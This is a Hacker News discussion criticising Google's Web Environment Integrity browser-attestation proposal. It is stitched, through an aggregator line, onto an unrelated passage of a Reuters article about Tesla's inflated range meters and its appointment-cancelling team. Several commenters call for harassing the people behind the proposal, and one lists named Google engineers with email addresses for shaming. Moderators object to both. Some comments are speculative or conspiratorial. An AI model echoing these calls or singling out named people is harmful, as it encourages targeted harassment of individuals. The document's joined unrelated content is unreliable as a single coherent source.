I feel like I have to repeat this, since so much is at stake here, where it is about the preservation of the web as we know it today, at the peril of having it turned into yet another walled garden:
The only way around the dystopia this will lead to is to constantly and relentlessly shame and even harass all those involved in helping create it. The scolding in the issue tracker of that wretched 'project' shall flow like a river, until the spirit of those pursuing it breaks, and the effort is disbanded.
And once the corporate hydra has regrown its head, repeat. Hopefully, enough practise makes those fighting the dystopia effective enough to one day topple over sponsoring and enabling organisations as a whole, instead of only their little initiatives leading down that path.
Not a pretty thing, but necessary.
Yeah, financial and social pressure are basically the only weapons we have against corporations when regulations don't exist. And honestly, financial pressure doesn't work at this scale or in this case.
All they'll have to do is make a pronouncement of support for some trendy social issue and everything will be forgiven and forgotten. Virtue signaling has turned into the most effective corporate tool for manipulating society into allowing corporations to do almost anything they want. And the public's addiction is so strong that even when this is pointed out and agreed that it is happening, the addiction still must be fed, so corporate sociopathic parasitism on society continues with the joyous approval of society in general.
Indeed. Negotiations have already turned out to be completely ineffective. The next step is war.
Cory Doctorow came up with the phrase 'The War on General-Purpose Computing', which describes the situation perfectly.
Is https://github.com/RupertBenWiser/Web-Environment-Integrity/... the best place to shame?
The battle is already lost legislatively.
Multiple US states, France, Germany and the UK are going to make the web unnavigable unless you type in your credit card number or scan your face for age verification on two out of every three sites.
We are going to need to at least try to create ways to secure those credentials in as zero-trust a model as possible.
(Note that the legislation is a disaster, but it is done. Nobody paid enough attention. It has passed or will pass in weeks.)
It won't do anything. You don't think they've anticipated random angry outbursts going into this? Plus, the people you're harassing are simply implementing a policy that they don't have the power to change.
The only pressure that Google has been shown to consistently respond to is political. Get a couple of senators (... of the right party) to send them a mild rebuke and they will indeed retreat a little (... and try something else later). But that's a lot harder than posting angry comments until the next piece of outrageous news comes along, isn't it?
Has anyone compiled a list of those pushing forward and/or working on WEI?
I don't like Google's grasp on so many vital parts of the web, but somehow it seems like Google is actually in trouble.
AI is going to completely change search if it hasn't already, and Google is not even close to being able to compete in this space.
Video has some massive competition from the likes of TikTok. Anyway, YouTube isn't the only option on the market.
Gmail is still popular, but since Google has been pressuring users to pay, it's been easier than ever to find a reason to try another service.
Chromium can always be forked and have some parts removed or added, and as we all know quite a few browsers do this, some quite popular.
Is Google also losing iOS ads like Meta? If they are, that's another reason for alarm.
I'm not sure Google is in the best position for the future, and WEI is not going to be their golden ticket either.
And, if your prediction that web will change actually comes to pass, well then it'll be just another cycle for this space that has changed countless times since the age of dialup. The web is going to change, again and again, but as long as people are still free to set up a server and let the world access it, we can still do what we like with it.
That sounds entirely unhelpful. They can just close the issue tracker + people will obviously just move on. This sounds like the Reddit 'blackout' that did nothing and is already forgotten.
What we really need is for the collective browser vendors to refuse to implement this and, if Chrome pushes forward, to bring Google to court over it. Nothing short of legal intervention is going to help here.
I agree with your overall ideal of free access to information but I disagree that harassment is a necessary or even effective option to push against this. I think the harassment puts us in a category of ineffective, bitter malcontents and that's not what we are.
We are capable of going to elsewhere to free and open access to information, and we would be better off spending our energy on positively influencing others to follow us in that direction. They can't take away tcp, http, ftp, irc and all the other protocols that these megaliths have built their empires on, and we can still use those tools even if it's a demoralizing regression to move back to the basics. Giants like google, Amazon and others depend on our unwillingness to rebuild. Let's use our efforts and our ingenuity to show them that they've underestimated us.
We have the tools, we have the knowledge. Let's be builders instead of petty complainers.
Oh but that would be against the respective projects' code of conduct. /s
> constantly and relentlessly shame and even harass all those involved in helping create it
Not on HN, please. I realize that you're trying to protect something you care about (and that maybe we all care about) but this leads to ugly mob behavior that we don't want and won't allow here.
> constantly and relentlessly shame and even harass all those involved in helping create it
If this ever helped, we wouldn't have absolutely unethical products created. Turns out people's morals have a price tag, that Google and others are willing to pay their employees.
Imo, the idea that this is about selling advertising and maintaining market share is being used as a false justification. This is not about being able to drive users to ads.
The bigger picture is that Google et al are actually part of the control structure. The governance system wants deanonymised Internet. Corporate interests are how this is being promoted - government legislation would be a harder pill for the masses to accept.
But all the recent mega changes (Elon buying Twitter, etc.) tell us that this is on the way. The apparently anonymous internet will be sandboxed. Knowing everything about everyone all the time, and having that data crunched by AIs, is an amazing, audacious goal that seems close to being achieved.
Just saw https://github.com/chromium/chromium/pull/187/files
It's even funnier with the auto-reply 'Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA).'
what exactly do you want to preserve from the web as we know it today?
let it burn
focus on building something new, new protocols, new networks, new browsers
Corporations will dismiss all of that as asshole Luddites, and do it anyway. You're not Google's customer. The advertisers are.
The only way to stop Google from treating the Web as their own OS is to take that power away from them, by switching to other browser engines.
Ah yes. The 'Uncle Ted' approach, but a bit more mild. At what point do we go full Ted?
Tiktok is literally controlled by the CCP. If consumers don't care about that, they aren't going to care about DRM.
fwiw I found Vivaldi's overview a good primer on the situation.
https://vivaldi.com/blog/googles-new-dangerous-web-environme...
Interesting, and it made me try out Vivaldi. Ten minutes later I had lost trust in their privacy claims.
While installing, it uses Microsoft Edge to open links -- like the link to their privacy policy -- even though the OS is set to use Firefox (and every other app respects that). Then I found out that it has no containerization features at all. Don't want Google cookies from one tab read in another tab? Use a new Private Window. No thanks. I uninstalled it, and then it used Edge to open a page asking why...
Thanks. Let's discuss that article here: https://news.ycombinator.com/item?id=36875940.
Apple would be in the position to fight this.
'Apple already shipped attestation on the web, and we barely noticed'
All of the major tech companies are in on this. Google and Apple already deployed it for their phone and desktop platforms (iOS, Android, macOS, ChromeOS, all support attestation already). Microsoft is getting there with Windows 11, and all new devices shipping since ~2015 have the hardware support. Google is now closing the gap on desktop browsers.
Soon the percentage of people supporting it will be high enough to make it mandatory - the last 5% can just get a new device or something like that. They'll do it when their bank website tells them so.
The day Cloudflare flips the switch to require it for all connections is the day the open web dies.
Apple is one of the bad guys before the bad guys even know they're bad guys... they already implemented this stuff.
Is there no EU regulation against this?
Careful, with the right arguments from Google the EU might just make this mandatory in the name of 'security'.
The EU is at the forefront of wanting only 'real people' online. So no, if anything digital identity is squarely within what would appease the EU
I've heard time and time again how this is 'the end of the free web'. Can someone succinctly explain how this is the case, for somebody not familiar with web browser architecture? What does WEI provide that wasn't previously possible?
Actually the free web ended with net neutrality. Didn't you notice when that happened?
Future web will require you to have certified browser - Chrome TM, to access the web. It will require certified OS WindowsTM, running on trusted Hardware TPMTM, running trusted firmware CIATM.
You'll have no choice and your love will be mandatory.
This won't stop malware of course. However a skull clamp will be installed to monitor your thoughts and you will be zapped if undesirable thoughts are detected.
Note: it's hyperbole, but if you want another OS, browser or hardware, you'll be forced to homebrew it. Or use a compromised app.
I wish Google would solve real developer pain points like having secure client side storage. That would be useful to developers. But heaven forbid they take a break for a moment from trying to squeeze every ounce of profit out of their users.
In order to have secure client-side storage, it seems like you would need to be able to verify that the client-side application that is accessing it is unmodified -- which is what WEI would allow for.
One of the proposals for WEI is to make it probabilistically fail.
I.e., on a given device, for 10% of websites, WEI pretends to be unsupported.
That means websites can't deny service where WEI is unsupported. Yet it still allows statistical analysis across bulk user accounts.
If WEI was implemented like this, I would support it as being good for the web ecosystem.
This is the bait to make it sound reasonable. Of course this hold-back feature will be quietly disabled at some point in the future. The whole proposal is full of weaselly half truths and misrepresentation about their real plans
The attitude from Google towards this has changed significantly over the last few days (unsurprisingly).
From the 'explainer': 'we are evaluating whether attestation signals must sometimes be held back [...] However, a holdback also has significant drawbacks [...] a deterministic but limited-entropy attestation [i.e. no holdback] would obviate the need for invasive fingerprinting'.
From the Google worker's most recent comment on the issue: 'WEI prevents ecosystem lock-in through hold-backs [...] This is designed to prevent WEI from becoming "DRM for the web"'
So, in other words, WEI could be used to prevent fingerprinting, but won't be able to if holdback is introduced -- 5-10% of clients would still get fingerprinted.
Looking at the list of 'scenarios where users depend on client trust', all of them would be impacted by a holdback mechanism:
- Preventing ad fraud: not for the holdback group
- Bot and sockpuppet accounts on social media: not for the holdback group
- Preventing cheating in games: not for the holdback group -- and thus not for anyone playing against someone in the holdback group
- Preventing malicious software that imitates a banking app: not for the holdback group
In other words, if there was holdback, WEI would require places which currently fingerprint to retain and maintain the fingerprinting code and apply it to fewer users, in the best case, or would be completely useless in the worst case (for things like games).
However, it's also quite interesting to look at the implications of successfully attesting a browser which supports arbitrary extensions:
- Preventing ad fraud: install an automation extension
- Bot and sockpuppet accounts: as above
- Cheating in games: install an extension which allows cheating
- Malicious software which imitates a banking app: a malicious browser extension could do this easily.
In other words, unless you attest the browser with its extensions, none of the trust scenarios outlined in the explainer are actually helped by WEI. It's not obvious whether the Google employee who wrote this deliberately didn't think about these things, or whether the 'explainer' is just a collection of unconnected ideas, but it doesn't appear to hold together.
It is not surprising that the first target of WEI -- Chrome on Android -- does not support extensions.
That's a silly proposal that will eventually be turned off as it causes issues. Users will complain that sometimes websites are broken for no reason, and the first proposed fix would be to turn the failure probability to zero. Then the zero-failure setting will become the default.
And what guarantees do you have that the probabilistic failure rate won't be turned to 0 at some point in the future?
Except for Google's pinky swear, I mean.
Here's how this goes:
WEI randomly fails; the website sees it but has never implemented any error checking (or fails on purpose when WEI is missing); WEI becomes effectively mandatory.
Google is a gun manufacturer telling the people on the other end of the barrel, 'don't worry, one in every 20 bullets doesn't fire'.
That's currently just an idea in the 'Open questions' section of the spec, but there is already pushback against it from others closely involved in the spec & discussion around this (https://github.com/RupertBenWiser/Web-Environment-Integrity/...) and notably the attestation feature Google already shipped on Android for native apps in the same situation does _not_ do this.
If 50% of people run adblock, then websites losing 10% of traffic because WEI probabilistically fails still seems like a win for big tech, if it forces users onto their approved, unmodified OS/browser.
The antifraud company that worked with Google on the WEI proposal is already calling for the removal of holdouts from the spec[0], because:
- Attestation does not work as an antifraud signal unless it is mandatory - fraudsters will just pretend to be a browser doing random holdout otherwise.
- The banks that want attestation do not want you using niche browsers to log in to their services.
[0] https://github.com/RupertBenWiser/Web-Environment-Integrity/...
I was watching a video about nesting in CSS and how it's just in Chrome, and the comments were all about how cool it is and how they can't wait to use it, and so on and so forth. I think it's quite a representative example: we can do that much better with SASS today, but I guess Google needs to keep pushing features at full speed so no one else can keep up.
We developers are so gullible. Just give us some shiny things and we don't even realize they're heating up the pan.
> I was watching a video about nesting in CSS and how it's just in Chrome
Nested CSS is supported in the latest version of all major browsers.
Mozilla should call for Google's removal from the W3C over this implementation of Web Environment Integrity. 'But Chrome has 65% market share, what good is the W3C without them?' If Google can take unilateral action to fundamentally change the basic principles of the web, then the W3C is already useless. This will give Google a clear choice: if they want to maintain the idea that the W3C matters, they should withdraw this implementation.
It is unbelievable that over the course of 3 days, the potential future of the web has been put in such dire straits. There's already an existing, far less troubling (while still bad), proposal in the form of Private Access Tokens going through a standards committee that Google chose to ignore. They presented this proposal in the shadiest way possible through a personal GitHub account. They immediately shut down outside contribution and comments. And despite the blowback they are already shoving a full implementation into Chromium.
What we need is real action, and this is the role Mozilla has always presented itself as serving. A 'true' disinterested defender of the ideals of the web. Now is the time to prove it. Simply opposing this proposal isn't enough. This is about as clear and basic an attack on what fundamentally differentiates the web from every walled garden as possible. If someone drafted a proposal to the W3C that stated that only existing browsers should be allowed to render web pages, the correct response would not be to 'take the stance that you oppose that proposal,' it would be to seriously question whether the submitting party should even participate in the group. Make no mistake, that is what is happening now.
It didn't happen when Apple did it with Safari (and you all were quiet as mice as well, with HN actively defending the Apple Safari monopoly with this feature enabled)... so why would NOW be any different?
> It is unbelievable that over the course of 3 days, the potential future of the web has been put in such dire straits.
'Move fast and break things.' How many here used to cheer this approach?
Good luck getting anything from Mozilla, Google is their largest source of revenue by far. Over half.
It's far, far too late for this. The W3C is already irrelevant, not that it ever mattered much.
The internet is made by big companies. Not standards bodies. The WHATWG has the actual living standards, and Google, Apple, Cloudflare and Amazon make the actual software. Nobody cares about the W3C. And Mozilla is long past dead.
When Google announced the EME DRM in the semi-public W3C HTML working group, it created a massive backlash. So W3C moved the EME spec under a new, closed, invite-only working group, and then announced that there is a consensus among everyone (there), and it can move forward to become a recommendation. They didn't even fix known bugs in the spec written by Google (e.g. architecture diagram in the EME spec is factually incorrect).
So I don't think this rubber-stamping W3C will do anything. They have no power over Google, and they know it.
Quite frankly, the W3C stopped having any say on the matter when the WHATWG supplanted the XHTML standard with the HTML5 committee.
At the time, they had enough weight to say 'the Web is XHTML2, you can make your own internet if you want', compared to what they can bargain for these days.
Maybe at the time it was a somewhat reasonable decision to abdicate their responsibility to the big internet companies, but that's what brought us to the current state, where we're basically going back to the original version of The Microsoft Network[1].
> If Google can take unilateral action to fundamentally change the basic principles of the web, then the W3C is already useless. This will give Google a clear choice: if they want to maintain the idea that the W3C matters, they should withdraw this implementation.
It's pretty generally accepted that the correct way to do web standardization is for proponents of some new thing to implement it and deploy it, and then, once it has been shown to actually work, bring a spec to the standards folks for standardization.
That usually works fairly well, although sometimes if that first pre-standard implementation does too well the original implementor may have trouble replacing theirs with something that follows whatever standard is eventually approved, because there are often significant changes made during the standardization process.
An example of that would be CSS grid layout. That was a Microsoft addition to IE 10, behind a vendor prefix of -ms-. Nearly everyone else liked it and it was standardized but with enough differences from Microsoft's original that you couldn't just remove the -ms- prefixes from your CSS and have it work great with the now standard CSS grid.
It was 4.5 years between the time Microsoft first deployed it in IE 10 and it appearing in other browsers by default (Chrome had it within a year of Microsoft, and Firefox had it about two years after that, but both as an experimental feature the user had to specifically enable). In that 4.5 years, enough sites that only cared about IE were using the -ms- form that Microsoft ended up stuck with it on IE 10 and 11 instead of the standard.
There is no chance Mozilla does anything that actually matters here. They may do some virtue signaling and put out a statement about how they support the open web but nothing more.
Can you give me an idea as to why WEI is a bad idea for the web? Granted, it is morning, but as I am going through the notes linked ( https://googlechrome.github.io/OriginTrials/developer-guide.... ), I am not sure I understand why it is that bad.
As a general rule of thumb, web technology has traditionally separated the content and protocol from the browser ('user agent') in terms of concerns. By which I mean, a user agent needs to be able to handle any possible input without breaking, and a web server needs to be able to handle any possible request without breaking.
WEI tries to shortcut that process by creating a secured sign-off system that would allow the server to only respond to queries from a blessed hardware and software configuration. This wildly constrains the user agents that would be possible. The pro for web developers is that they wouldn't have to concern themselves with whether their server or the HTML they are emitting is broadly standards-compliant and compatible; they can just make sure it works with the target platforms they care about and rest easy knowing no other platforms can touch their system. But this is bad for anybody who, for whatever reason, can't use the blessed platforms (user agent and hardware combinations).
Immediate practical consequences are that a lot of the screen reader solutions people use would probably break (because the screen readers wouldn't be certified user agents), a lot of clever hacks would be far less feasible (the website somebody hacked together to track whether the ice cream machine was broken at McDonald's restaurants relied upon being able to pretend it was the McDonald's smartphone app well enough to attempt to put ice cream in the shopping bag), and it would basically become impossible to build a new browser or operating system from scratch compatible with the web (they wouldn't work with the websites people wanted to use because they wouldn't be certified as authentic on any of those sites).
This proposal grossly changes the balance of power on how the web works and places most of it in the hands of the incumbent browser and computer hardware vendors.
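For a rough picture of how a page would use it, the draft explainer sketches a flow along these lines; the method name and the shape of the returned token are provisional, so treat this as pseudocode rather than a settled API:

// Sketch only: API surface per the draft explainer, details subject to change.
async function gateOnIntegrity() {
  if (!('getEnvironmentIntegrity' in navigator)) {
    return fetch('/content'); // unsupported browser (or a holdback, if that survives)
  }
  // The page asks the browser for an attestation bound to some request-specific string.
  const attestation = await navigator.getEnvironmentIntegrity('binding-123'); // binding value invented
  return fetch('/content', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    // The server forwards this opaque token to the attester's verifier and
    // decides whether to serve the real content.
    body: JSON.stringify({ attestation }),
  });
}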
Basically aims to make desktop browsers work like non-jailbroken iPhones: locked down and outside the user's control, for better and worse. You could also compare it to client-side anticheat in PC games.
Can somebody explain what the practical implications of this are?
You'll need an 'approved' browser and potentially 'approved' hardware to access the web. Since Cloudflare is on this too, most of the web will be locked for anyone who doesn't use mainstream hardware.
From a very top level view, this gives Google, and other websites, the ability to block requests from devices/browsers they don't approve.
This implements device level verification of the code running your browser. If the device identifies as something Google, or other implementing websites, don't approve, you'll get an error similar to how you see 404 errors for missing/wrong links.
Unblockable ads, sites can serve you data that you can't manipulate or copy, micropayments can exist, invasive surveillance.
Surveillance is possibly the worst of the bunch. They say it's just to do a better job of serving ads, but that's only the tip of the iceberg. Governments could easily use it to know and track everything you do online. Just wait till the next elected nut job wants a list of everybody who has ever looked at or searched for a certain type of information. Maybe they don't like that you looked up info on abortion or LGBT topics; now they can know the full extent of what you saw and when.
Ads will be worse. You think YouTube ads are bad now? Just wait till you can't visit any page without the mandatory viewing of their ads. They could require a camera to be installed to make sure your eyes are on the ad, helpfully pausing the video when you look away.
The browser application needs to pass a binary image check, and if the browser hash doesn't match Google's database, you cannot proceed to the website (since your browser may be corrupted). This is a big deal for non-mainstream browsers, for non-Google browser developers, for extension developers (e.g. AdBlock), etc. In summary, some websites (like banks, Netflix, etc.) will no longer be available to users of non-mainstream browsers. Also, even if you're using Google Chrome, you may need to run the latest version to satisfy the hash check. Every day, the number of broken websites will keep growing until all non-Chrome users have a blocked internet.
Nothing will happen. People have been making the same complaints about every new crypto standard for decades, and yet here we are. TPMs are a thing, EME has been around for over a decade now, DRM on the web is as pervasive as it's ever going to get, and yet no one's user experience is any worse than it was before these technologies existed.
ENORMOUS fingerprinting potential and capability to disrupt the user's ability to block content. Or access it.
To turn your browser (an agent acting on your behalf) into a proprietary application (an agent acting on behalf of a website) -- i.e. the equivalent of forcing you to install a proprietary application in order to visit a website.
This is essentially a backdoor attempt to TiVoize[0] web browsers. The only difference is that, instead of directly using hardware to prevent you from running a modified browser, the intent is to use network effects to accomplish the same thing.
If adopted by publishers, the web will be closed to everyone but allowed browsers on allowed OSes on allowed hardware. No ad blockers, no extensions, no customizations beyond what the few chosen browsers allow explicitly.
I've been holding on to my Firefox installation after switching back around ~2016 or so. I was on the Chrome bandwagon when they were the upstart (still have the comic from the launch!) but it didn't take long to see how dangerous things were getting with monoculture.
If you want to help, push back on all the anti-Firefox rhetoric that amplifies every little misstep they take. Firefox is so much better from a user-respect perspective, and the vitriol over little things (a couple of anonymous, tracking-free sponsored links on a new tab page?) is losing the plot.
Maybe they shouldn't have added the Pocket links if they didn't want the vitriol. Tracking or not (I'm still not 100% convinced that they're not), it doesn't look good when your browser greets you with that stuff. It's like entering a neighborhood and seeing a 'checks cashed' store.
This is where you should vote with your wallet and feet. And I think it's not really a stretch to ask Google's engineers who work on Chrome/Chromium to get a job somewhere else.
I think it would be interesting to get their views on it. I wouldn't be surprised if a lot think this is a good idea. Not that I agree, but I think it's unlikely that everyone sees it the same way as those outside the organisation.
The web is not dying, it is being killed. And the people that are killing it have names and addresses.
Shame on Rayan Kanso <[email protected]>
Shame on Peter Pakkenberg <[email protected]>
Shame on Dmitry Gozman <[email protected]>
Shame on Richard Coles <[email protected]>
Shame on Kinuko Yasuda <[email protected]>
Shame on Rupert Ben Wiser: https://github.com/RupertBenWiser/Web-Environment-Integrity
Google needs to be broken up.
No personal attacks, please. It's not what this site is for, and destroys what it is for.
You can make your substantive points without that, as most other users in this thread have been doing.
You may not owe web-destroying $MegaCorp better, but you owe this community better if you're participating in it.
Currently development and standardization occurs in the open, on GitHub and elsewhere. When it's decided that's no longer possible, I hope you realize that this kind of targeted harassment is what led to its demise.
Shame on all the knowledgeable people who happily keep using Chrome and giving Google money, and who make the web more centralized by giving more and more power to entities that benefit from this, like Cloudflare.
HN is full of people that are indirectly helping to push these changes forward. You're preaching to the choir, and the choir is too lazy to switch browsers or learn how to configure a web server, so they just shrug and carry on.
I predict that hardware attestation will in 10-30 years become a requirement to maintain an internet connection.
Given Microsoft's push to make their OS support hardware attestation, as well as Google's push for technologies that use hardware attestation in broader and broader scopes (Android and iOS have supported this for apps for a long time), the technology to make this possible is becoming increasingly widespread.
Hardware which supports hardware attestation is expensive and some people who can't afford it would therefore be excluded. But I don't think this matters.
If Google forces you to see all their ads, then they can sell the ad space for more money. This can make it increasingly profitable to sell devices at an ever-increasing loss. Likewise for Microsoft.
As a side note, this will make it incredibly difficult for anyone to compete in the hardware space. Why would someone spend even £500 on a phone or computer from a non-adtech company when the adtech company can sell the same device for £100 or £50, or maybe even give it away for free?
By making hardware attestation more mainstream, it will become increasingly difficult to argue that enabling it for things would cut off customers.
I think it's easy to argue in favor of requiring hardware attestation for internet connections from the point of view of a government or an ISP. After all, if your customers can only use a limited set of hardware which is known and tested for security, it decreases the chance of security problems. For a police state like the UK, it seems even easier to justify.
Even if things don't go that far, in a few years you will become a second class citizen for refusing to allow this on your devices. I can easily imagine banks requiring WEI for their online banking portals (they already do it for all their apps). Likewise I can also imagine my water, gas and electricity companies, or really any company which handles payments, considering this technology.
The worst part is, I don't think most people will care as long as it keeps working seamlessly on their devices. Likewise I don't think governments or the EU will do anything about it. I am not even sure what I can do about it.
> I predict that hardware attestation will in 10-30 years become a requirement to maintain an internet connection.
I fear you're right. But if the current trends keep up, I'll have abandoned the internet entirely before that happens.
I mourn for what we have already lost, and we are poised to lose even more.
> I predict that hardware attestation will in 10-30 years become a requirement to maintain an internet connection.
What you fail to take into account is that geeks like being able to freely goof around with stuff, and that new disruptive tech evolves precisely in the ecosystems where geeks are goofing around with stuff.
Consider the dichotomy between iPadOS and macOS. macOS still exists — and still has things like the ability to disable Gatekeeper, enable arbitrary kernel-extension installation, etc. — because the geeks inside Apple could never be productive developing an OS on a workstation that is itself a sealed appliance. They need freely-modifiable systems to hack on. And they may as well sell other people those free systems they've developed — with defaults that make the tool appliance-esque, sure, but also with clear paths to turning those safeties off.
The same thing was true in the 90s with the rise of walled-garden ISPs. The average consumer might be happy with just having access to e.g. AOL, but the people who work with computers (including the programmers at AOL!) won't be happy unless they can write a program that opens a raw IP socket and speaks to another copy of that program on their friend's computer halfway around the world. And so, despite not really mentioning it as a feature, every walled-garden ISP did implicitly connect you to the 'raw' Internet over PPP, rather than just speaking to the walled-garden backend BBS-style — because that's what the engineers at each ISP wanted to happen when they used their own ISP, and they weren't going to tolerate anything less.
And then, gradually, all the most interesting stuff for consumers on the Internet — all the 'killer apps' — started being things you could only find on the 'raw' web, rather than in these walled gardens — precisely because the geeks who knew how to build this stuff had enthusiasm for building it as part of the open web, and no enthusiasm for building it as part of a walled-garden experience. (I would bet money that many a walled-garden developer had ideas for Internet services that they wrote down at work, but then implemented at home — maybe under a pseudonym, to get out from under noncompetes.)
Even if there comes about an 'attested Internet', and big companies shift over to using it, all the cool new stuff will always be occurring off to the side, on the 'non-attested Internet.' You can't eliminate the 'non-attested Internet' for the same reason that you can't develop an Operating System purely using kiosk computing appliances.
The next big killer app, after the 'attested Internet' becomes a thing, will be built on the 'non-attested Internet.' And then what'll happen? Everyone will demand an Internet plan that includes access to the 'non-attested Internet', if that had been something eliminated in the interim. (Which it wouldn't have been, since all the engineers at the ISPs would never have stood for having their own Internet connections broken like that.)
Is Brave browser safe from this considering it uses Chromium?
I guess they could un-cherry-pick this 'feature', but that doesn't mitigate Google or publishers requiring a response from this API in order to serve a request.
I'm not sure how exactly ad fraud works, but how is WEI even supposed to prevent it? There are many tools that allow you to control your mouse and keyboard programmatically, like pyautogui [0].
Will the OS check whether such a Python lib is installed, or whether a script is running in the background? Then those doing ad fraud will move to a programmable board acting as a BLE keyboard/mouse/HID. Even a micro:bit can be programmed as a BLE HID device [1]. Add an external camera on an unattested device that stares at the attested device's screen and you can automate lots of things. Sure, this is more complicated to pull off, but it will probably happen eventually anyway if this is a lucrative business.
In the end, WEI wouldn't prevent ad fraud or fakes but would end up being used to restrict other things.
> Will the OS check whether such a Python lib is installed
Most computers come with a trusted platform module which runs more and more services related to media handling. On modern Macs the T2 chip is an A8 or A9, meaning it has the same power as a modern iPhone and handles everything from device input (mouse & keyboard) to webcam decoding to media decoding. When you watch Netflix on a modern MacBook, the video buffer that is displayed is actually a shared memory buffer from the T2 chip, which the main SoC can't actually see. If you take a screenshot, you will see that the screen stays black, since audio and video come purely from that chip.
You could run a browser's renderer in there and you would never notice.
Not a lawyer, but this seems ripe for antitrust action. Microsoft got sued back in the 2000s for simply bundling IE with their operating system. The behavior of Google (and quite frankly Microsoft with Edge) seems way, way worse than whatever MS was doing when they got sued.
But MS still bundles IE, and they've gotten more pushy about it lately.
825 points 5 days ago by mfiguiere in 181st position
www.reuters.com | Estimated reading time – 17 minutes
AUSTIN, Texas
In March, Alexandre Ponsin set out on a family road trip from Colorado to California in his newly purchased Tesla, a used 2021 Model 3. He expected to get something close to the electric sport sedan's advertised driving range: 353 miles on a fully charged battery.
He soon realized he was sometimes getting less than half that much range, particularly in cold weather – such severe underperformance that he was convinced the car had a serious defect.
"We're looking at the range, and you literally see the number decrease in front of your eyes," he said of his dashboard range meter.
Ponsin contacted Tesla and booked a service appointment in California. He later received two text messages, telling him that "remote diagnostics" had determined his battery was fine, and then: "We would like to cancel your visit."
What Ponsin didn't know was that Tesla employees had been instructed to thwart any customers complaining about poor driving range from bringing their vehicles in for service. Last summer, the company quietly created a "Diversion Team" in Las Vegas to cancel as many range-related appointments as possible.
The Austin, Texas-based electric carmaker deployed the team because its service centers were inundated with appointments from owners who had expected better performance based on the company's advertised estimates and the projections displayed by the in-dash range meters of the cars themselves, according to several people familiar with the matter.
Inside the Nevada team's office, some employees celebrated canceling service appointments by putting their phones on mute and striking a metal xylophone, triggering applause from coworkers who sometimes stood on desks. The team often closed hundreds of cases a week and staffers were tracked on their average number of diverted appointments per day.
Managers told the employees that they were saving Tesla about $1,000 for every canceled appointment, the people said. Another goal was to ease the pressure on service centers, some of which had long waits for appointments.
In most cases, the complaining customers' cars likely did not need repair, according to the people familiar with the matter. Rather, Tesla created the groundswell of complaints another way – by hyping the range of its futuristic electric vehicles, or EVs, raising consumer expectations beyond what the cars can deliver. Teslas often fail to achieve their advertised range estimates and the projections provided by the cars' own equipment, according to Reuters interviews with three automotive experts who have tested or studied the company's vehicles.
Neither Tesla nor Chief Executive Elon Musk responded to detailed questions from Reuters for this story.
Tesla years ago began exaggerating its vehicles' potential driving distance – by rigging their range-estimating software. The company decided about a decade ago, for marketing purposes, to write algorithms for its range meter that would show drivers "rosy" projections for the distance it could travel on a full battery, according to a person familiar with an early design of the software for its in-dash readouts.
Then, when the battery fell below 50% of its maximum charge, the algorithm would show drivers more realistic projections for their remaining driving range, this person said. To prevent drivers from getting stranded as their predicted range started declining more quickly, Teslas were designed with a "safety buffer," allowing about 15 miles (24 km) of additional range even after the dash readout showed an empty battery, the source said.
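Purely as an illustration of the two-stage behavior described above -- every constant and name here is invented, not taken from Tesla software:

// Hypothetical two-stage range readout mirroring the article's description.
function displayedRangeMiles(stateOfCharge, ratedMilesAtFull, realWorldFactor) {
  // stateOfCharge: 0.0-1.0; realWorldFactor: assumed, e.g. ~0.7 on a cold day
  if (stateOfCharge > 0.5) {
    // 'Rosy' mode: simply scale the rated figure by the charge level.
    return ratedMilesAtFull * stateOfCharge;
  }
  // Below half charge: switch to a conditions-aware projection, holding back an
  // assumed ~15-mile reserve so the display reads empty before the pack truly is.
  const realistic = ratedMilesAtFull * stateOfCharge * realWorldFactor;
  return Math.max(realistic - 15, 0);
}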
The directive to present the optimistic range estimates came from Tesla Chief Executive Elon Musk, this person said.
"Elon wanted to show good range numbers when fully charged," the person said, adding: "When you buy a car off the lot seeing 350-mile, 400-mile range, it makes you feel good."
Tesla's intentional inflation of in-dash range-meter projections and the creation of its range-complaints diversion team have not been previously reported.
Driving range is among the most important factors in consumer decisions on which electric car to buy, or whether to buy one at all. So-called range anxiety – the fear of running out of power before reaching a charger – has been a primary obstacle to boosting electric-vehicle sales.
At the time Tesla programmed in the rosy range projections, it was selling only two models: the two-door Roadster, its first vehicle, which was later discontinued; and the Model S, a luxury sport sedan launched in 2012. It now sells four models: two cars, the 3 and S; and two crossover SUVs, the X and Y. Tesla plans the return of the Roadster, along with a "Cybertruck" pickup.
Reuters could not determine whether Tesla still uses algorithms that boost in-dash range estimates. But automotive testers and regulators continue to flag the company for exaggerating the distance its vehicles can travel before their batteries run out.
Tesla was fined earlier this year by South Korean regulators who found the cars delivered as little as half their advertised range in cold weather. Another recent study found that three Tesla models averaged 26% below their advertised ranges.
The U.S. Environmental Protection Agency (EPA) has required Tesla since the 2020 model year to reduce the range estimates the automaker wanted to advertise for six of its vehicles by an average of 3%. The EPA told Reuters, however, that it expects some variation between the results of separate tests conducted by automakers and the agency.
Data collected in 2022 and 2023 from more than 8,000 Teslas by Recurrent, a Seattle-based EV analytics company, showed that the cars' dashboard range meters didn't change their estimates to reflect hot or cold outside temperatures, which can greatly reduce range.
Recurrent found that Tesla's four models almost always calculated that they could travel more than 90% of their advertised EPA range estimates regardless of external temperatures. Scott Case, Recurrent's chief executive, told Reuters that Tesla's range meters also ignore many other conditions affecting driving distance.
Electric cars can lose driving range for a lot of the same reasons as gasoline cars — but to a greater degree. The cold is a particular drag on EVs, slowing the chemical and physical reactions inside their batteries and requiring a heating system to protect them. Other drains on the battery include hilly terrain, headwinds, a driver's lead foot and running the heating or air-conditioning inside the cabin.
Tesla discusses the general effect of such conditions in a "Range Tips" section of its website. The automaker also recently updated its vehicle software to provide a breakdown of battery consumption during recent trips with suggestions on how range might have been improved.
Tesla vehicles provide range estimates in two ways: One through a dashboard meter of current range that's always on, and a second projection through its navigation system, which works when a driver inputs a specific destination. The navigation system's range estimate, Case said, does account for a wider set of conditions, including temperature. While those estimates are "more realistic," they still tend to overstate the distance the car can travel before it needs to be recharged, he said.
Recurrent tested other automakers' in-dash range meters – including the Ford Mustang Mach-E, the Chevrolet Bolt and the Hyundai Kona – and found them to be more accurate. The Kona's range meter generally underestimated the distance the car could travel, the tests showed. Recurrent conducted the study with the help of a National Science Foundation grant.
Tesla, Case said, has consistently designed the range meters in its cars to deliver aggressive rather than conservative estimates: "That's where Tesla has taken a different path from most other automakers."
Failed tests and false advertising
Tesla isn't the only automaker with cars that don't regularly achieve their advertised ranges.
